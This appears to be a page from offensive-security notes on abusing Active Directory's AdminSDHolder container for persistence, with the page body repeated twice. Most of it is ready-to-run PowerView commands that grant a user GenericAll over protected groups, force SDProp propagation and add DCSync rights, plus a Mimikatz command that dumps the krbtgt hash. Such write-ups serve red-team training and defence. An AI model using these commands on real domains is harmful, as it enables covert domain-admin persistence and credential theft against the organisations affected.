Abusing AdminSDHolder for Persistence

Last updated 3 years ago

Was this helpful?

Abusing AdminSDHolder for Persistence

AdminSDHolder is a special AD container with some "default" security permissions that is used as a template for protected AD accounts and groups (like Domain Admins, Enterprise Admins, etc.) to prevent their accidental and unintended modifications, and to keep them secure.

AdminSDHolder is an object located in the System Partition in Active Directory cn=adminsdholder,cn=system,dc=domain,dc=comand is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that don’t match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder.

Once you have agained Domain Admin privileges, AdminSDHolder container can be abused by backdooring it by giving your user GenericAll privileges, which effectively makes that user a Domain Admin.

How it Works

Abusing the AdminSDHolder container with PowerView by adding an ACL that provides user fcastel with GenericAll rights for Domain Admins group:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName fcastel -Verbose -Rights All

Now we should wait for 60 min so the changes will propagate automatically we need to force it to change less than this time we can do that using Invoke-SDPropagator.ps1

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

Now, confirming that the user fcastel has got GenericAll privileges against Domain Admins group:

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'fcastel'}

we can abuse this to get rights for DCSync

Add-ObjectAcl -TargetDistinguishedName 'DC=marvel,DC=local' - PrincipalSamAccountName fcastel -Rights DCSync -Verbose

Execute DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:marvel\krbtgt"'

Resources

https://attack.stealthbits.com/adminsdholder-modification-ad-persistence
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
https://adsecurity.org/?p=1906

PreviousWhoAmi NextKerberoasting

Last updated 3 years ago

Was this helpful?

Once you have agained Domain Admin privileges, AdminSDHolder container can be abused by backdooring it by giving your user GenericAll privileges, which effectively makes that user a Domain Admin.

How it Works

Abusing the AdminSDHolder container with PowerView by adding an ACL that provides user fcastel with GenericAll rights for Domain Admins group:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName fcastel -Verbose -Rights All

Now we should wait for 60 min so the changes will propagate automatically we need to force it to change less than this time we can do that using Invoke-SDPropagator.ps1

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

Now, confirming that the user fcastel has got GenericAll privileges against Domain Admins group:

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'fcastel'}

we can abuse this to get rights for DCSync

Add-ObjectAcl -TargetDistinguishedName 'DC=marvel,DC=local' - PrincipalSamAccountName fcastel -Rights DCSync -Verbose

Execute DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:marvel\krbtgt"'

Resources

https://attack.stealthbits.com/adminsdholder-modification-ad-persistence
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
https://adsecurity.org/?p=1906